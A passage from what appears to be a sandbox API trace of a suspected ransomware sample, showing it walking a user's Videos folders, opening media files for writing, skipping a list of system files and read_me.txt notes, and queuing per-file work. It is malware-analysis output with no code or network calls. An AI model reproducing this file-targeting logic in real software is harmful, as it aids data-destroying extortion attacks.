lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c620760, ftCreationTime.dwHighDateTime=0x1d4d2e7, ftLastAccessTime.dwLowDateTime=0xe5a70de0, ftLastAccessTime.dwHighDateTime=0x1d4c679, ftLastWriteTime.dwLowDateTime=0xe5a70de0, ftLastWriteTime.dwHighDateTime=0x1d4c679, nFileSizeHigh=0x0, nFileSizeLow=0x7755, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="mqpdda7r45ju71WgcCTp.mkv", cAlternateFileName="MQPDDA~1.MKV")) returned 1 [0082.974] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\mqpdda7r45ju71WgcCTp.mkv") returned 70 [0082.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\mqpdda7r45ju71WgcCTp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wd9b\\mqpdda7r45ju71wgcctp.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e0 [0082.974] StrStrW (lpFirst="mqpdda7r45ju71wgcctp.mkv", lpSrch="read_me.txt") returned 0x0 [0082.974] StrStrW (lpFirst="mqpdda7r45ju71wgcctp.mkv", lpSrch="autoexec.bat") returned 0x0 [0082.974] StrStrW (lpFirst="mqpdda7r45ju71wgcctp.mkv", lpSrch="desktop.ini") returned 0x0 [0082.974] StrStrW (lpFirst="mqpdda7r45ju71wgcctp.mkv", lpSrch="autorun.inf") returned 0x0 [0082.974] StrStrW (lpFirst="mqpdda7r45ju71wgcctp.mkv", lpSrch="ntuser.dat") returned 0x0 [0082.974] StrStrW (lpFirst="mqpdda7r45ju71wgcctp.mkv", lpSrch="iconcache.db") returned 0x0 [0082.974] StrStrW (lpFirst="mqpdda7r45ju71wgcctp.mkv", lpSrch="bootsect.bak") returned 0x0 [0082.974] StrStrW (lpFirst="mqpdda7r45ju71wgcctp.mkv", lpSrch="boot.ini") returned 0x0 [0082.974] StrStrW (lpFirst="mqpdda7r45ju71wgcctp.mkv", lpSrch="ntuser.dat.log") returned 0x0 [0082.975] StrStrW (lpFirst="mqpdda7r45ju71wgcctp.mkv", lpSrch="thumbs.db") returned 0x0 [0082.975] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 203 [0082.975] QueueUserWorkItem (Function=0x404e00, Context=0x8e0, Flags=0x0) returned 1 [0082.975] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e15820, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0082.975] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\read_me.txt") returned 57 [0082.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wd9b\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8dc [0082.975] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0082.975] CloseHandle (hObject=0x8dc) returned 1 [0082.975] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ef14c80, ftCreationTime.dwHighDateTime=0x1d4d26c, ftLastAccessTime.dwLowDateTime=0xb2815e70, ftLastAccessTime.dwHighDateTime=0x1d4d2ea, ftLastWriteTime.dwLowDateTime=0xb2815e70, ftLastWriteTime.dwHighDateTime=0x1d4d2ea, nFileSizeHigh=0x0, nFileSizeLow=0xfd5, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Rq-FcdG3-15f.flv", cAlternateFileName="RQ-FCD~1.FLV")) returned 1 [0082.975] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\Rq-FcdG3-15f.flv") returned 62 [0082.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\Rq-FcdG3-15f.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wd9b\\rq-fcdg3-15f.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8dc [0082.975] StrStrW (lpFirst="rq-fcdg3-15f.flv", lpSrch="read_me.txt") returned 0x0 [0082.975] StrStrW (lpFirst="rq-fcdg3-15f.flv", lpSrch="autoexec.bat") returned 0x0 [0082.975] StrStrW (lpFirst="rq-fcdg3-15f.flv", lpSrch="desktop.ini") returned 0x0 [0082.975] StrStrW (lpFirst="rq-fcdg3-15f.flv", lpSrch="autorun.inf") returned 0x0 [0082.975] StrStrW (lpFirst="rq-fcdg3-15f.flv", lpSrch="ntuser.dat") returned 0x0 [0082.975] StrStrW (lpFirst="rq-fcdg3-15f.flv", lpSrch="iconcache.db") returned 0x0 [0082.975] StrStrW (lpFirst="rq-fcdg3-15f.flv", lpSrch="bootsect.bak") returned 0x0 [0082.976] StrStrW (lpFirst="rq-fcdg3-15f.flv", lpSrch="boot.ini") returned 0x0 [0082.976] StrStrW (lpFirst="rq-fcdg3-15f.flv", lpSrch="ntuser.dat.log") returned 0x0 [0082.976] StrStrW (lpFirst="rq-fcdg3-15f.flv", lpSrch="thumbs.db") returned 0x0 [0082.976] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 204 [0082.976] QueueUserWorkItem (Function=0x404e00, Context=0x8dc, Flags=0x0) returned 1 [0082.976] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80295800, ftCreationTime.dwHighDateTime=0x1d4c7dd, ftLastAccessTime.dwLowDateTime=0xef683870, ftLastAccessTime.dwHighDateTime=0x1d4c8ce, ftLastWriteTime.dwLowDateTime=0xef683870, ftLastWriteTime.dwHighDateTime=0x1d4c8ce, nFileSizeHigh=0x0, nFileSizeLow=0x17e42, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="rU_BrzhcrHdZtvUPIz.avi", cAlternateFileName="RU_BRZ~1.AVI")) returned 1 [0082.976] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\rU_BrzhcrHdZtvUPIz.avi") returned 68 [0082.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\rU_BrzhcrHdZtvUPIz.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wd9b\\ru_brzhcrhdztvupiz.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8d8 [0082.976] StrStrW (lpFirst="ru_brzhcrhdztvupiz.avi", lpSrch="read_me.txt") returned 0x0 [0082.976] StrStrW (lpFirst="ru_brzhcrhdztvupiz.avi", lpSrch="autoexec.bat") returned 0x0 [0082.976] StrStrW (lpFirst="ru_brzhcrhdztvupiz.avi", lpSrch="desktop.ini") returned 0x0 [0082.976] StrStrW (lpFirst="ru_brzhcrhdztvupiz.avi", lpSrch="autorun.inf") returned 0x0 [0082.976] StrStrW (lpFirst="ru_brzhcrhdztvupiz.avi", lpSrch="ntuser.dat") returned 0x0 [0082.976] StrStrW (lpFirst="ru_brzhcrhdztvupiz.avi", lpSrch="iconcache.db") returned 0x0 [0082.976] StrStrW (lpFirst="ru_brzhcrhdztvupiz.avi", lpSrch="bootsect.bak") returned 0x0 [0082.976] StrStrW (lpFirst="ru_brzhcrhdztvupiz.avi", lpSrch="boot.ini") returned 0x0 [0082.976] StrStrW (lpFirst="ru_brzhcrhdztvupiz.avi", lpSrch="ntuser.dat.log") returned 0x0 [0082.976] StrStrW (lpFirst="ru_brzhcrhdztvupiz.avi", lpSrch="thumbs.db") returned 0x0 [0082.976] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 205 [0082.976] QueueUserWorkItem (Function=0x404e00, Context=0x8d8, Flags=0x0) returned 1 [0082.977] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25e5700, ftCreationTime.dwHighDateTime=0x1d4d3b7, ftLastAccessTime.dwLowDateTime=0x88761bf0, ftLastAccessTime.dwHighDateTime=0x1d4cf1d, ftLastWriteTime.dwLowDateTime=0x88761bf0, ftLastWriteTime.dwHighDateTime=0x1d4cf1d, nFileSizeHigh=0x0, nFileSizeLow=0xb7fc, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="rY1pBDpLHJLMgoo.swf", cAlternateFileName="RY1PBD~1.SWF")) returned 1 [0082.977] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\rY1pBDpLHJLMgoo.swf") returned 65 [0082.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\rY1pBDpLHJLMgoo.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wd9b\\ry1pbdplhjlmgoo.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8d4 [0082.977] StrStrW (lpFirst="ry1pbdplhjlmgoo.swf", lpSrch="read_me.txt") returned 0x0 [0082.977] StrStrW (lpFirst="ry1pbdplhjlmgoo.swf", lpSrch="autoexec.bat") returned 0x0 [0082.977] StrStrW (lpFirst="ry1pbdplhjlmgoo.swf", lpSrch="desktop.ini") returned 0x0 [0082.977] StrStrW (lpFirst="ry1pbdplhjlmgoo.swf", lpSrch="autorun.inf") returned 0x0 [0082.977] StrStrW (lpFirst="ry1pbdplhjlmgoo.swf", lpSrch="ntuser.dat") returned 0x0 [0082.977] StrStrW (lpFirst="ry1pbdplhjlmgoo.swf", lpSrch="iconcache.db") returned 0x0 [0082.977] StrStrW (lpFirst="ry1pbdplhjlmgoo.swf", lpSrch="bootsect.bak") returned 0x0 [0082.977] StrStrW (lpFirst="ry1pbdplhjlmgoo.swf", lpSrch="boot.ini") returned 0x0 [0082.977] StrStrW (lpFirst="ry1pbdplhjlmgoo.swf", lpSrch="ntuser.dat.log") returned 0x0 [0082.977] StrStrW (lpFirst="ry1pbdplhjlmgoo.swf", lpSrch="thumbs.db") returned 0x0 [0082.977] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 206 [0082.977] QueueUserWorkItem (Function=0x404e00, Context=0x8d4, Flags=0x0) returned 1 [0082.977] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73cd16f0, ftCreationTime.dwHighDateTime=0x1d4cf9e, ftLastAccessTime.dwLowDateTime=0x4c405f30, ftLastAccessTime.dwHighDateTime=0x1d4d146, ftLastWriteTime.dwLowDateTime=0x4c405f30, ftLastWriteTime.dwHighDateTime=0x1d4d146, nFileSizeHigh=0x0, nFileSizeLow=0xa32f, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="zw5yCF4m.mkv", cAlternateFileName="")) returned 1 [0082.977] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\zw5yCF4m.mkv") returned 58 [0082.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\zw5yCF4m.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wd9b\\zw5ycf4m.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8d0 [0082.977] StrStrW (lpFirst="zw5ycf4m.mkv", lpSrch="read_me.txt") returned 0x0 [0082.978] StrStrW (lpFirst="zw5ycf4m.mkv", lpSrch="autoexec.bat") returned 0x0 [0082.978] StrStrW (lpFirst="zw5ycf4m.mkv", lpSrch="desktop.ini") returned 0x0 [0082.978] StrStrW (lpFirst="zw5ycf4m.mkv", lpSrch="autorun.inf") returned 0x0 [0082.978] StrStrW (lpFirst="zw5ycf4m.mkv", lpSrch="ntuser.dat") returned 0x0 [0082.978] StrStrW (lpFirst="zw5ycf4m.mkv", lpSrch="iconcache.db") returned 0x0 [0082.978] StrStrW (lpFirst="zw5ycf4m.mkv", lpSrch="bootsect.bak") returned 0x0 [0082.978] StrStrW (lpFirst="zw5ycf4m.mkv", lpSrch="boot.ini") returned 0x0 [0082.978] StrStrW (lpFirst="zw5ycf4m.mkv", lpSrch="ntuser.dat.log") returned 0x0 [0082.978] StrStrW (lpFirst="zw5ycf4m.mkv", lpSrch="thumbs.db") returned 0x0 [0082.978] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 207 [0082.978] QueueUserWorkItem (Function=0x404e00, Context=0x8d0, Flags=0x0) returned 1 [0082.978] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73cd16f0, ftCreationTime.dwHighDateTime=0x1d4cf9e, ftLastAccessTime.dwLowDateTime=0x4c405f30, ftLastAccessTime.dwHighDateTime=0x1d4d146, ftLastWriteTime.dwLowDateTime=0x4c405f30, ftLastWriteTime.dwHighDateTime=0x1d4d146, nFileSizeHigh=0x0, nFileSizeLow=0xa32f, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="zw5ycf4m.mkv", cAlternateFileName="")) returned 0 [0082.978] FindClose (in: hFindFile=0x7cfe768 | out: hFindFile=0x7cfe768) returned 1 [0082.978] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wD9B\\read_me.txt") returned 57 [0082.978] GetProcessHeap () returned 0x4f10000 [0082.978] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8af0080 | out: hHeap=0x4f10000) returned 1 [0082.978] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 92 [0082.978] GetProcessHeap () returned 0x4f10000 [0082.978] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b00088 | out: hHeap=0x4f10000) returned 1 [0082.978] GetProcessHeap () returned 0x4f10000 [0082.978] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b20098 [0082.978] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\*") returned 52 [0082.978] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\*", lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd393e160, ftCreationTime.dwHighDateTime=0x1d4d460, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe768 [0082.979] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\.") returned 52 [0082.979] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd393e160, ftCreationTime.dwHighDateTime=0x1d4d460, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0082.979] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\..") returned 53 [0082.979] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2c72c60, ftCreationTime.dwHighDateTime=0x1d4c660, ftLastAccessTime.dwLowDateTime=0x5d185f10, ftLastAccessTime.dwHighDateTime=0x1d4c63d, ftLastWriteTime.dwLowDateTime=0x5d185f10, ftLastWriteTime.dwHighDateTime=0x1d4c63d, nFileSizeHigh=0x0, nFileSizeLow=0x18513, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="ev8FpKoRtOSaHWq-sk.mkv", cAlternateFileName="EV8FPK~1.MKV")) returned 1 [0082.979] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\ev8FpKoRtOSaHWq-sk.mkv") returned 73 [0082.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\ev8FpKoRtOSaHWq-sk.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xwjzbluzl\\ev8fpkortosahwq-sk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8cc [0082.979] StrStrW (lpFirst="ev8fpkortosahwq-sk.mkv", lpSrch="read_me.txt") returned 0x0 [0082.979] StrStrW (lpFirst="ev8fpkortosahwq-sk.mkv", lpSrch="autoexec.bat") returned 0x0 [0082.979] StrStrW (lpFirst="ev8fpkortosahwq-sk.mkv", lpSrch="desktop.ini") returned 0x0 [0082.979] StrStrW (lpFirst="ev8fpkortosahwq-sk.mkv", lpSrch="autorun.inf") returned 0x0 [0082.979] StrStrW (lpFirst="ev8fpkortosahwq-sk.mkv", lpSrch="ntuser.dat") returned 0x0 [0082.979] StrStrW (lpFirst="ev8fpkortosahwq-sk.mkv", lpSrch="iconcache.db") returned 0x0 [0082.979] StrStrW (lpFirst="ev8fpkortosahwq-sk.mkv", lpSrch="bootsect.bak") returned 0x0 [0082.979] StrStrW (lpFirst="ev8fpkortosahwq-sk.mkv", lpSrch="boot.ini") returned 0x0 [0082.979] StrStrW (lpFirst="ev8fpkortosahwq-sk.mkv", lpSrch="ntuser.dat.log") returned 0x0 [0082.979] StrStrW (lpFirst="ev8fpkortosahwq-sk.mkv", lpSrch="thumbs.db") returned 0x0 [0082.979] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 208 [0082.979] QueueUserWorkItem (Function=0x404e00, Context=0x8cc, Flags=0x0) returned 1 [0082.980] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93478cf0, ftCreationTime.dwHighDateTime=0x1d4d191, ftLastAccessTime.dwLowDateTime=0x97a90b50, ftLastAccessTime.dwHighDateTime=0x1d4ca8b, ftLastWriteTime.dwLowDateTime=0x97a90b50, ftLastWriteTime.dwHighDateTime=0x1d4ca8b, nFileSizeHigh=0x0, nFileSizeLow=0x1331d, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="OxHI_zkRZQhTWMK.mkv", cAlternateFileName="OXHI_Z~1.MKV")) returned 1 [0082.980] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\OxHI_zkRZQhTWMK.mkv") returned 70 [0082.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\OxHI_zkRZQhTWMK.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xwjzbluzl\\oxhi_zkrzqhtwmk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c8 [0082.980] StrStrW (lpFirst="oxhi_zkrzqhtwmk.mkv", lpSrch="read_me.txt") returned 0x0 [0082.980] StrStrW (lpFirst="oxhi_zkrzqhtwmk.mkv", lpSrch="autoexec.bat") returned 0x0 [0082.980] StrStrW (lpFirst="oxhi_zkrzqhtwmk.mkv", lpSrch="desktop.ini") returned 0x0 [0082.980] StrStrW (lpFirst="oxhi_zkrzqhtwmk.mkv", lpSrch="autorun.inf") returned 0x0 [0082.980] StrStrW (lpFirst="oxhi_zkrzqhtwmk.mkv", lpSrch="ntuser.dat") returned 0x0 [0082.980] StrStrW (lpFirst="oxhi_zkrzqhtwmk.mkv", lpSrch="iconcache.db") returned 0x0 [0082.980] StrStrW (lpFirst="oxhi_zkrzqhtwmk.mkv", lpSrch="bootsect.bak") returned 0x0 [0082.980] StrStrW (lpFirst="oxhi_zkrzqhtwmk.mkv", lpSrch="boot.ini") returned 0x0 [0082.980] StrStrW (lpFirst="oxhi_zkrzqhtwmk.mkv", lpSrch="ntuser.dat.log") returned 0x0 [0082.980] StrStrW (lpFirst="oxhi_zkrzqhtwmk.mkv", lpSrch="thumbs.db") returned 0x0 [0082.980] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 209 [0082.980] QueueUserWorkItem (Function=0x404e00, Context=0x8c8, Flags=0x0) returned 1 [0082.980] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e539a70, ftCreationTime.dwHighDateTime=0x1d4ccf6, ftLastAccessTime.dwLowDateTime=0x14982aa0, ftLastAccessTime.dwHighDateTime=0x1d4d28f, ftLastWriteTime.dwLowDateTime=0x14982aa0, ftLastWriteTime.dwHighDateTime=0x1d4d28f, nFileSizeHigh=0x0, nFileSizeLow=0x160b1, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="qwCPYTNwoNJY0yytIU.flv", cAlternateFileName="QWCPYT~1.FLV")) returned 1 [0082.980] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\qwCPYTNwoNJY0yytIU.flv") returned 73 [0082.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\qwCPYTNwoNJY0yytIU.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xwjzbluzl\\qwcpytnwonjy0yytiu.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c4 [0082.980] StrStrW (lpFirst="qwcpytnwonjy0yytiu.flv", lpSrch="read_me.txt") returned 0x0 [0082.981] StrStrW (lpFirst="qwcpytnwonjy0yytiu.flv", lpSrch="autoexec.bat") returned 0x0 [0082.981] StrStrW (lpFirst="qwcpytnwonjy0yytiu.flv", lpSrch="desktop.ini") returned 0x0 [0082.981] StrStrW (lpFirst="qwcpytnwonjy0yytiu.flv", lpSrch="autorun.inf") returned 0x0 [0082.981] StrStrW (lpFirst="qwcpytnwonjy0yytiu.flv", lpSrch="ntuser.dat") returned 0x0 [0082.981] StrStrW (lpFirst="qwcpytnwonjy0yytiu.flv", lpSrch="iconcache.db") returned 0x0 [0082.981] StrStrW (lpFirst="qwcpytnwonjy0yytiu.flv", lpSrch="bootsect.bak") returned 0x0 [0082.981] StrStrW (lpFirst="qwcpytnwonjy0yytiu.flv", lpSrch="boot.ini") returned 0x0 [0082.981] StrStrW (lpFirst="qwcpytnwonjy0yytiu.flv", lpSrch="ntuser.dat.log") returned 0x0 [0082.981] StrStrW (lpFirst="qwcpytnwonjy0yytiu.flv", lpSrch="thumbs.db") returned 0x0 [0082.981] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 210 [0082.981] QueueUserWorkItem (Function=0x404e00, Context=0x8c4, Flags=0x0) returned 1 [0082.981] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e15820, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0082.981] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\read_me.txt") returned 62 [0082.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xwjzbluzl\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c0 [0082.981] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0082.981] CloseHandle (hObject=0x8c0) returned 1 [0082.982] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e15820, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24e15820, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e15820, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0082.982] FindClose (in: hFindFile=0x7cfe768 | out: hFindFile=0x7cfe768) returned 1 [0082.982] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xwJZblUZL\\read_me.txt") returned 62 [0082.982] GetProcessHeap () returned 0x4f10000 [0082.982] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b20098 | out: hHeap=0x4f10000) returned 1 [0082.982] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 93 [0082.982] GetProcessHeap () returned 